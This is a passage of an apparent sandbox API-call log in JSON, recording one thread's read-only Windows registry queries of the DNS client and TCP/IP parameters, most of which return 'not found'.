"HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\UpdateTopLevelDomainZones" } ], "repeated": 0, "id": 1242 }, { "timestamp": "2025-11-20 10:58:34,031", "thread_id": "3408", "caller": "0x7ffedff9cd60", "parentcaller": "0x7ffedff9cb93", "category": "registry", "api": "RegQueryValueExW", "status": false, "return": "0x00000002", "arguments": [ { "name": "Handle", "value": "0x0000048c" }, { "name": "ValueName", "value": "DowncaseSpnCauseApiOwnerIsTooLazy" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\DowncaseSpnCauseApiOwnerIsTooLazy" } ], "repeated": 0, "id": 1243 }, { "timestamp": "2025-11-20 10:58:34,031", "thread_id": "3408", "caller": "0x7ffedff9cd60", "parentcaller": "0x7ffedff9cb93", "category": "registry", "api": "RegQueryValueExW", "status": false, "return": "0x00000002", "arguments": [ { "name": "Handle", "value": "0x0000048c" }, { "name": "ValueName", "value": "RegistrationOverwrite" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\RegistrationOverwrite" } ], "repeated": 0, "id": 1244 }, { "timestamp": "2025-11-20 10:58:34,031", "thread_id": "3408", "caller": "0x7ffedff9cd60", "parentcaller": "0x7ffedff9cb93", "category": "registry", "api": "RegQueryValueExW", "status": false, "return": "0x00000002", "arguments": [ { "name": "Handle", "value": "0x0000048c" }, { "name": "ValueName", "value": "MaxCacheSize" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\MaxCacheSize" } ], "repeated": 0, "id": 1245 }, { "timestamp": "2025-11-20 10:58:34,031", "thread_id": "3408", "caller": "0x7ffedff9cd60", "parentcaller": "0x7ffedff9cb93", "category": "registry", "api": "RegQueryValueExW", "status": false, "return": "0x00000002", "arguments": [ { "name": "Handle", "value": "0x0000048c" }, { "name": "ValueName", "value": "MaxCacheTtl" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\MaxCacheTtl" } ], "repeated": 0, "id": 1246 }, { "timestamp": "2025-11-20 10:58:34,031", "thread_id": "3408", "caller": "0x7ffedff9cd60", "parentcaller": "0x7ffedff9cb93", "category": "registry", "api": "RegQueryValueExW", "status": false, "return": "0x00000002", "arguments": [ { "name": "Handle", "value": "0x0000048c" }, { "name": "ValueName", "value": "MaxNegativeCacheTtl" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\MaxNegativeCacheTtl" } ], "repeated": 0, "id": 1247 }, { "timestamp": "2025-11-20 10:58:34,031", "thread_id": "3408", "caller": "0x7ffedff9cd60", "parentcaller": "0x7ffedff9cb93", "category": "registry", "api": "RegQueryValueExW", "status": false, "return": "0x00000002", "arguments": [ { "name": "Handle", "value": "0x0000048c" }, { "name": "ValueName", "value": "AdapterTimeoutLimit" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\AdapterTimeoutLimit" } ], "repeated": 0, "id": 1248 }, { "timestamp": "2025-11-20 10:58:34,031", "thread_id": "3408", "caller": "0x7ffedff9cd60", "parentcaller": "0x7ffedff9cb93", "category": "registry", "api": "RegQueryValueExW", "status": false, "return": "0x00000002", "arguments": [ { "name": "Handle", "value": "0x0000048c" }, { "name": "ValueName", "value": "ServerPriorityTimeLimit" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\ServerPriorityTimeLimit" } ], "repeated": 0, "id": 1249 }, { "timestamp": "2025-11-20 10:58:34,031", "thread_id": "3408", "caller": "0x7ffedff9cd60", "parentcaller": "0x7ffedff9cb93", "category": "registry", "api": "RegQueryValueExW", "status": false, "return": "0x00000002", "arguments": [ { "name": "Handle", "value": "0x0000048c" }, { "name": "ValueName", "value": "MaxCachedSockets" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\MaxCachedSockets" } ], "repeated": 0, "id": 1250 }, { "timestamp": "2025-11-20 10:58:34,031", "thread_id": "3408", "caller": "0x7ffedff9cd60", "parentcaller": "0x7ffedff9cb93", "category": "registry", "api": "RegQueryValueExW", "status": false, "return": "0x00000002", "arguments": [ { "name": "Handle", "value": "0x0000048c" }, { "name": "ValueName", "value": "DisableServerUnreachability" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\DisableServerUnreachability" } ], "repeated": 0, "id": 1251 }, { "timestamp": "2025-11-20 10:58:34,031", "thread_id": "3408", "caller": "0x7ffedff9cd60", "parentcaller": "0x7ffedff9cb93", "category": "registry", "api": "RegQueryValueExW", "status": false, "return": "0x00000002", "arguments": [ { "name": "Handle", "value": "0x0000048c" }, { "name": "ValueName", "value": "EnableMulticast" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\EnableMulticast" } ], "repeated": 0, "id": 1252 }, { "timestamp": "2025-11-20 10:58:34,031", "thread_id": "3408", "caller": "0x7ffedff9cd60", "parentcaller": "0x7ffedff9cb93", "category": "registry", "api": "RegQueryValueExW", "status": false, "return": "0x00000002", "arguments": [ { "name": "Handle", "value": "0x0000048c" }, { "name": "ValueName", "value": "MulticastResponderFlags" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\MulticastResponderFlags" } ], "repeated": 0, "id": 1253 }, { "timestamp": "2025-11-20 10:58:34,031", "thread_id": "3408", "caller": "0x7ffedff9cd60", "parentcaller": "0x7ffedff9cb93", "category": "registry", "api": "RegQueryValueExW", "status": false, "return": "0x00000002", "arguments": [ { "name": "Handle", "value": "0x0000048c" }, { "name": "ValueName", "value": "MulticastSenderFlags" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\MulticastSenderFlags" } ], "repeated": 0, "id": 1254 }, { "timestamp": "2025-11-20 10:58:34,031", "thread_id": "3408", "caller": "0x7ffedff9cd60", "parentcaller": "0x7ffedff9cb93", "category": "registry", "api": "RegQueryValueExW", "status": false, "return": "0x00000002", "arguments": [ { "name": "Handle", "value": "0x0000048c" }, { "name": "ValueName", "value": "MulticastSenderMaxTimeout" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\MulticastSenderMaxTimeout" } ], "repeated": 0, "id": 1255 }, { "timestamp": "2025-11-20 10:58:34,031", "thread_id": "3408", "caller": "0x7ffedff9cd60", "parentcaller": "0x7ffedff9cb93", "category": "registry", "api": "RegQueryValueExW", "status": false, "return": "0x00000002", "arguments": [ { "name": "Handle", "value": "0x0000048c" }, { "name": "ValueName", "value": "EnableMDNS" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\EnableMDNS" } ], "repeated": 0, "id": 1256 }, { "timestamp": "2025-11-20 10:58:34,031", "thread_id": "3408", "caller": "0x7ffedff9cd60", "parentcaller": "0x7ffedff9cb93", "category": "registry", "api": "RegQueryValueExW", "status": false, "return": "0x00000002", "arguments": [ { "name": "Handle", "value": "0x0000048c" }, { "name": "ValueName", "value": "DnsTest" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\DnsTest" } ], "repeated": 0, "id": 1257 }, { "timestamp": "2025-11-20 10:58:34,031", "thread_id": "3408", "caller": "0x7ffedff9cd60", "parentcaller": "0x7ffedff9cb93", "category": "registry", "api": "RegQueryValueExW", "status": false, "return": "0x00000002", "arguments": [ { "name": "Handle", "value": "0x0000048c" }, { "name": "ValueName", "value": "UseCompartments" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\UseCompartments" } ], "repeated": 0, "id": 1258 }, { "timestamp": "2025-11-20 10:58:34,031", "thread_id": "3408", "caller": "0x7ffedff9cd60", "parentcaller": "0x7ffedff9cb93", "category": "registry", "api": "RegQueryValueExW", "status": false, "return": "0x00000002", "arguments": [ { "name": "Handle", "value": "0x0000048c" }, { "name": "ValueName", "value": "CacheAllCompartments" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\CacheAllCompartments" } ], "repeated": 0, "id": 1259 }, { "timestamp": "2025-11-20 10:58:34,031", "thread_id": "3408", "caller": "0x7ffedff9cd60", "parentcaller": "0x7ffedff9cb93", "category": "registry", "api": "RegQueryValueExW", "status": false, "return": "0x00000002", "arguments": [ { "name": "Handle", "value": "0x0000048c" }, { "name": "ValueName", "value": "UseNewRegistration" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\UseNewRegistration" } ], "repeated": 0, "id": 1260 }, { "timestamp": "2025-11-20 10:58:34,031", "thread_id": "3408", "caller": "0x7ffedff9cd60", "parentcaller": "0x7ffedff9cb93", "category": "registry", "api": "RegQueryValueExW", "status": false, "return": "0x00000002", "arguments": [ { "name": "Handle", "value": "0x0000048c" }, { "name": "ValueName", "value": "ResolverRegistration" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\ResolverRegistration" } ], "repeated": 0, "id": 1261 }, { "timestamp": "2025-11-20 10:58:34,031", "thread_id": "3408", "caller": "0x7ffedff9cd60", "parentcaller": "0x7ffedff9cb93", "category": "registry", "api": "RegQueryValueExW", "status": false, "return": "0x00000002", "arguments": [ { "name": "Handle", "value": "0x0000048c" }, { "name": "ValueName", "value": "ResolverRegistrationOnly" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\ResolverRegistrationOnly" } ], "repeated": 0, "id": 1262 }, { "timestamp": "2025-11-20 10:58:34,031", "thread_id": "3408", "caller": "0x7ffedff9cd60", "parentcaller": "0x7ffedff9cb93", "category": "registry", "api": "RegQueryValueExW", "status": false, "return": "0x00000002", "arguments": [ { "name": "Handle", "value": "0x0000048c" }, { "name": "ValueName", "value": "NewDhcpSrvRegistration" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\NewDhcpSrvRegistration" } ], "repeated": 0, "id": 1263 }, { "timestamp": "2025-11-20 10:58:34,031", "thread_id": "3408", "caller": "0x7ffedff9cd60", "parentcaller": "0x7ffedff9cb93", "category": "registry", "api": "RegQueryValueExW", "status": false, "return": "0x00000002", "arguments": [ { "name": "Handle", "value": "0x0000048c" }, { "name": "ValueName", "value": "DirectAccessPreferLocal" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\DirectAccessPreferLocal" } ], "repeated": 0, "id": 1264 }, { "timestamp": "2025-11-20 10:58:34,047", "thread_id": "3408", "caller": "0x7ffedff9cd60", "parentcaller": "0x7ffedff9cb93", "category": "registry", "api": "RegQueryValueExW", "status": false, "return": "0x00000002", "arguments": [ { "name": "Handle", "value": "0x0000048c" }, { "name": "ValueName", "value": "DisableIdnEncoding" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\DisableIdnEncoding" } ], "repeated": 0, "id": 1265 }, { "timestamp": "2025-11-20 10:58:34,047", "thread_id": "3408", "caller": "0x7ffedff9cd60", "parentcaller": "0x7ffedff9cb93", "category": "registry", "api": "RegQueryValueExW", "status": false, "return": "0x00000002", "arguments": [ { "name": "Handle", "value": "0x0000048c" }, { "name": "ValueName", "value": "EnableIdnMapping" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\EnableIdnMapping" } ], "repeated": 0, "id": 1266 }, { "timestamp": "2025-11-20 10:58:34,047", "thread_id": "3408", "caller": "0x7ffedff9cd60", "parentcaller": "0x7ffedff9cb93", "category": "registry", "api": "RegQueryValueExW", "status": false, "return": "0x00000002", "arguments": [ { "name": "Handle", "value": "0x0000048c" }, { "name": "ValueName", "value": "ShortnameProxyDefault" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\ShortnameProxyDefault" } ], "repeated": 0, "id": 1267 }, { "timestamp": "2025-11-20 10:58:34,047", "thread_id": "3408", "caller": "0x7ffedff9cd60", "parentcaller": "0x7ffedff9cb93", "category": "registry", "api": "RegQueryValueExW", "status": false, "return": "0x00000002", "arguments": [ { "name": "Handle", "value": "0x0000048c" }, { "name": "ValueName", "value": "DisableNRPTForAdapterRegistration" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\DisableNRPTForAdapterRegistration" } ], "repeated": 0, "id": 1268 }, { "timestamp": "2025-11-20 10:58:34,047", "thread_id": "3408", "caller": "0x7ffedff9cd60", "parentcaller": "0x7ffedff9cb93", "category": "registry", "api": "RegQueryValueExW", "status": false, "return": "0x00000002", "arguments": [ { "name": "Handle", "value": "0x0000048c" }, { "name": "ValueName", "value": "TestMode_AdaptiveTimeoutHistoryLength" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\TestMode_AdaptiveTimeoutHistoryLength" } ], "repeated": 0, "id": 1269 }, { "timestamp": "2025-11-20 10:58:34,047", "thread_id": "3408", "caller": "0x7ffedff9cd60", "parentcaller": "0x7ffedff9cb93", "category": "registry", "api": "RegQueryValueExW", "status": false, "return": "0x00000002", "arguments": [ { "name": "Handle", "value": "0x0000048c" }, { "name": "ValueName", "value": "TestMode_AdaptiveTimeoutRecalculationInterval" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\TestMode_AdaptiveTimeoutRecalculationInterval" } ], "repeated": 0, "id": 1270 }, { "timestamp": "2025-11-20 10:58:34,047", "thread_id": "3408", "caller": "0x7ffedffabccb", "parentcaller": "0x7ffedffaaa57", "category": "registry", "api": "RegQueryValueExW", "status": false, "return": "0x00000002", "arguments": [ { "name": "Handle", "value": "0x0000048c" }, { "name": "ValueName", "value": "DnsQueryTimeouts" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\DnsQueryTimeouts" } ], "repeated": 0, "id": 1271 }, { "timestamp": "2025-11-20 10:58:34,047", "thread_id": "3408", "caller": "0x7ffedffaa7e3", "parentcaller": "0x7ffedffaa179", "category": "registry", "api": "RegQueryValueExW", "status": false, "return": "0x00000002", "arguments": [ { "name": "Handle", "value": "0x00000490" }, { "name": "ValueName", "value": "DnsQueryTimeouts" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Tcpip\\Parameters\\DnsQueryTimeouts" } ], "repeated": 0, "id": 1272 }, { "timestamp": "2025-11-20 10:58:34,047", "thread_id": "3408", "caller": "0x7ffedffabccb", "parentcaller": "0x7ffedffaaa57", "category": "registry", "api": "RegQueryValueExW", "status": false, "return": "0x00000002", "arguments": [ { "name": "Handle", "value": "0x0000048c" }, { "name": "ValueName", "value": "DnsQuickQueryTimeouts" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Dnscache\\Parameters\\DnsQuickQueryTimeouts" } ], "repeated": 0, "id": 1273 }, { "timestamp": "2025-11-20 10:58:34,047", "thread_id": "3408", "caller": "0x7ffedffaa7e3", "parentcaller": "0x7ffedffaa179", "category": "registry", "api": "RegQueryValueExW", "status": false, "return": "0x00000002", "arguments": [ { "name": "Handle", "value": "0x00000490" }, { "name": "ValueName", "value": "DnsQuickQueryTimeouts" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Tcpip\\Parameters\\DnsQuickQueryTimeouts" } ], "repeated": 0, "id": 1274 }, { "timestamp": "2025-11-20 10:58:34,047", "thread_id": "3408", "caller": "0x7ffedffac301", "parentcaller": "0x7ffedff9cbe1", "category": "registry", "api": "RegCloseKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000490" } ], "repeated": 0, "id": 1275 }, { "timestamp": "2025-11-20 10:58:34,047", "thread_id": "3408", "caller": "0x7ffedffac316", "parentcaller": "0x7ffedff9cbe1", "category": "registry", "api": "RegCloseKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x0000048c" } ], "repeated": 0, "id": 1276 }, { "timestamp": "2025-11-20 10:58:34,047", "thread_id": "3408", "caller": "0x7ffedffac013", "parentcaller": "0x7ffedffaa75e", "category": "registry", "api": "RegCreateKeyExW", "status": true, "return": "0x00000000", "arguments": [ { "name": "Registry", "value": "0x80000002", "pretty_value": "HKEY_LOCAL_MACHINE" }, { "name": "SubKey", "value": "System\\CurrentControlSet\\Services\\Tcpip\\Parameters" }, { "name": "Class", "value": "Class" }, { "name": "Access", "value": "0x00020019", "pretty_value": "KEY_READ" }, { "name": "Handle", "value": "0x0000048c" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters" }, { "name": "Disposition", "value": "2", "pretty_value": "REG_OPENED_EXISTING_KEY" } ], "repeated": 0, "id": 1277 }, { "timestamp": "2025-11-20 10:58:34,047", "thread_id": "3408", "caller": "0x7ffedffac19f", "parentcaller": "0x7ffedffaa75e", "category": "registry", "api": "RegOpenKeyExW", "status": true, "return": "0x00000000", "arguments": [ { "name": "Registry", "value": "0x80000002", "pretty_value": "HKEY_LOCAL_MACHINE" }, { "name": "SubKey", "value": "SYSTEM\\CurrentControlSet\\Services\\Dnscache\\Parameters" }, { "name": "Handle", "value": "0x00000490" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\Dnscache\\Parameters" } ], "repeated": 0, "id": 1278 }, { "timestamp": "2025-11-20 10:58:34,047", "thread_id": "3408", "caller": "0x7ffedffac1db", "parentcaller": "0x7ffedffaa75e", "category": "registry", "api": "RegOpenKeyExW", "status": false, "return": "0x00000002", "arguments": [ { "name": "Registry", "value": "0x80000002", "pretty_value": "HKEY_LOCAL_MACHINE" }, { "name": "SubKey", "value": "Software\\Policies\\Microsoft\\Windows NT\\DnsClient" }, { "name": "Handle", "value": "0x00000000" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\Software\\Policies\\Microsoft\\Windows NT\\DnsClient" } ], "repeated": 0, "id": 1279 }, { "timestamp": "2025-11-20 10:58:34,047", "thread_id": "3408", "caller": "0x7ffedffaa7e3", "parentcaller": "0x7ffedffa835a", "category": "registry", "api": "RegQueryValueExW", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x0000048c" }, { "name": "ValueName", "value": "Hostname" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Tcpip\\Parameters\\Hostname" } ], "repeated": 0, "id": 1280 }, { "timestamp": "2025-11-20 10:58:34,047", "thread_id": "3408", "caller": "0x7ffedffaa88d", "parentcaller": "0x7ffedffa835a", "category": "registry", "api": "RegQueryValueExW", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x0000048c" }, { "name": "ValueName", "value": "Hostname" }, { "name": "Data", "value": "HOME-PC" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Tcpip\\Parameters\\Hostname" } ], "repeated": 0, "id": 1281 }, { "timestamp": "2025-11-20 10:58:34,047", "thread_id": "3408", "caller": "0x7ffedffaa9d8", "parentcaller": "0x7ffedffa835a", "category": "registry", "api": "RegCloseKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x0000048c" } ], "repeated": 0, "id": 1282 }, { "timestamp": "2025-11-20 10:58:34,047", "thread_id": "3408", "caller": "0x7ffedffaa9ed", "parentcaller": "0x7ffedffa835a", "category": "registry", "api": "RegCloseKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000490" } ], "repeated": 0, "id": 1283 }, { "timestamp": "2025-11-20 10:58:34,047", "thread_id": "3408", "caller": "0x7ffedffac013", "parentcaller": "0x7ffedffa9bf3", "category": "registry", "api": "RegCreateKeyExW", "status": true, "return": "0x00000000", "arguments": [ { "name": "Registry", "value": "0x80000002", "pretty_value": "HKEY_LOCAL_MACHINE" }, { "name": "SubKey", "value": "System\\CurrentControlSet\\Services\\Tcpip\\Parameters" }, { "name": "Class", "value": "Class" }, { "name": "Access", "value": "0x00020019", "pretty_value": "KEY_READ" }, { "name": "Handle", "value": "0x00000490" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters" }, { "name": "Disposition", "value": "2", "pretty_value": "REG_OPENED_EXISTING_KEY" } ], "repeated": 0, "id": 1284 }, { "timestamp": "2025-11-20 10:58:34,047", "thread_id": "3408", "caller": "0x7ffedffac19f", "parentcaller": "0x7ffedffa9bf3", "category": "registry", "api": "RegOpenKeyExW", "status": true, "return": "0x00000000", "arguments": [ { "name": "Registry", "value": "0x80000002", "pretty_value": "HKEY_LOCAL_MACHINE" }, { "name": "SubKey", "value": "SYSTEM\\CurrentControlSet\\Services\\Dnscache\\Parameters" }, { "name": "Handle", "value": "0x0000048c" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\Dnscache\\Parameters" } ], "repeated": 0, "id": 1285 }, { "timestamp": "2025-11-20 10:58:34,047", "thread_id": "3408", "caller": "0x7ffedffac1db", "parentcaller": "0x7ffedffa9bf3", "category": "registry", "api": "RegOpenKeyExW", "status": false, "return": "0x00000002", "arguments": [ { "name": "Registry", "value": "0x80000002", "pretty_value": "HKEY_LOCAL_MACHINE" }, { "name": "SubKey", "value": "Software\\Policies\\Microsoft\\Windows NT\\DnsClient" }, { "name": "Handle", "value": "0x00000000" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\Software\\Policies\\Microsoft\\Windows NT\\DnsClient" } ], "repeated": 0, "id": 1286 }, { "timestamp": "2025-11-20 10:58:34,047", "thread_id": "3408", "caller": "0x7ffedffa9c33", "parentcaller": "0x7ffedffa8371", "category": "registry", "api": "RegOpenKeyExW", "status": false, "return": "0x00000002", "arguments": [ { "name": "Registry", "value": "0x80000002", "pretty_value": "HKEY_LOCAL_MACHINE" }, { "name": "SubKey", "value": "Software\\Policies\\Microsoft\\System\\DNSClient" }, { "name": "Handle", "value": "0x00000000" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\Software\\Policies\\Microsoft\\System\\DNSClient" } ], "repeated": 0, "id": 1287 }, { "timestamp": "2025-11-20 10:58:34,047", "thread_id": "3408", "caller": "0x7ffedffaa7e3", "parentcaller": "0x7ffedffa9c69", "category": "registry", "api": "RegQueryValueExW", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000490" }, { "name": "ValueName", "value": "Domain" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Tcpip\\Parameters\\Domain" } ], "repeated": 0, "id": 1288 }, { "timestamp": "2025-11-20 10:58:34,047", "thread_id": "3408", "caller": "0x7ffedffaa88d", "parentcaller": "0x7ffedffa9c69", "category": "registry", "api": "RegQueryValueExW", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000490" }, { "name": "ValueName", "value": "Domain" }, { "name": "Data", "value": "" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Tcpip\\Parameters\\Domain" } ], "repeated": 0, "id": 1289 }, { "timestamp": "2025-11-20 10:58:34,047", "thread_id": "3408", "caller": "0x7ffedffac301", "parentcaller": "0x7ffedffa9ce8", "category": "registry", "api": "RegCloseKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000490" } ], "repeated": 0, "id": 1290 }, { "timestamp": "2025-11-20 10:58:34,047", "thread_id": "3408", "caller": "0x7ffedffac316", "parentcaller": "0x7ffedffa9ce8", "category": "registry", "api": "RegCloseKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x0000048c" } ], "repeated": 0, "id": 1291 }, { "timestamp": "2025-11-20 10:58:34,047", "thread_id": "3408", "caller": "0x7ffedffac013", "parentcaller": "0x7ffedffaa75e", "category": "registry", "api": "RegCreateKeyExW", "status": true, "return": "0x00000000", "arguments": [ { "name": "Registry", "value": "0x80000002", "pretty_value": "HKEY_LOCAL_MACHINE" }, { "name": "SubKey", "value": "System\\CurrentControlSet\\Services\\Tcpip\\Parameters" }, { "name": "Class", "value": "Class" }, { "name": "Access", "value": "0x00020019", "pretty_value": "KEY_READ" }, { "name": "Handle", "value": "0x0000048c" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters" }, { "name": "Disposition", "value": "2", "pretty_value": "REG_OPENED_EXISTING_KEY" } ], "repeated": 0, "id": 1292 }, { "timestamp": "2025-11-20 10:58:34,047", "thread_id": "3408", "caller": "0x7ffedffac19f", "parentcaller": "0x7ffedffaa75e", "category": "registry", "api": "RegOpenKeyExW", "status": true, "return": "0x00000000", "arguments": [ { "name": "Registry", "value": "0x80000002", "pretty_value": "HKEY_LOCAL_MACHINE" }, { "name": "SubKey", "value": "SYSTEM\\CurrentControlSet\\Services\\Dnscache\\Parameters" }, { "name": "Handle", "value": "0x00000490" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\Dnscache\\Parameters" } ], "repeated": 0, "id": 1293 }, { "timestamp": "2025-11-20 10:58:34,047", "thread_id": "3408", "caller": "0x7ffedffac1db", "parentcaller": "0x7ffedffaa75e", "category": "registry", "api": "RegOpenKeyExW", "status": false, "return": "0x00000002", "arguments": [ { "name": "Registry", "value": "0x80000002", "pretty_value": "HKEY_LOCAL_MACHINE" }, { "name": "SubKey", "value": "Software\\Policies\\Microsoft\\Windows NT\\DnsClient" }, { "name": "Handle", "value": "0x00000000" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\Software\\Policies\\Microsoft\\Windows NT\\DnsClient" } ], "repeated": 0, "id": 1294 }, { "timestamp": "2025-11-20 10:58:34,047", "thread_id": "3408", "caller": "0x7ffedffaa7e3", "parentcaller": "0x7ffedffa9b67", "category": "registry", "api": "RegQueryValueExW", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x0000048c" }, { "name": "ValueName", "value": "Hostname" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Tcpip\\Parameters\\Hostname" } ], "repeated": 0, "id": 1295 }, { "timestamp": "2025-11-20 10:58:34,047", "thread_id": "3408", "caller": "0x7ffedffaa88d", "parentcaller": "0x7ffedffa9b67", "category": "registry", "api": "RegQueryValueExW", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x0000048c" }, { "name": "ValueName", "value": "Hostname" }, { "name": "Data", "value": "HOME-PC" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\Tcpip\\Parameters\\Hostname" } ], "repeated": 0, "id": 1296 }, { "timestamp": "2025-11-20 10:58:34,047", "thread_id": "3408", "caller": "0x7ffedffaa9d8", "parentcaller": "0x7ffedffa9b67", "category": "registry", "api": "RegCloseKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x0000048c" } ], "repeated": 0, "id": 1297 }, { "timestamp": "2025-11-20 10:58:34,047", "thread_id": "3408", "caller": "0x7ffedffaa9ed", "parentcaller": "0x7ffedffa9b67", "category": "registry", "api": "RegCloseKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000490" } ], "repeated": 0, "id": 1298 }, { "timestamp": "2025-11-20 10:58:34,047", "thread_id": "3408", "caller": "0x7ffee2111793", "parentcaller": "0x7ffedff5207d", "category": "device", "api": "NtDeviceIoControlFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x000003ec" }, { "name": "HandleName", "value": "\\Device\\Nsi" }, { "name": "IoControlCode", "value": "0x00120007" }, { "name": "InputBuffer", "value": 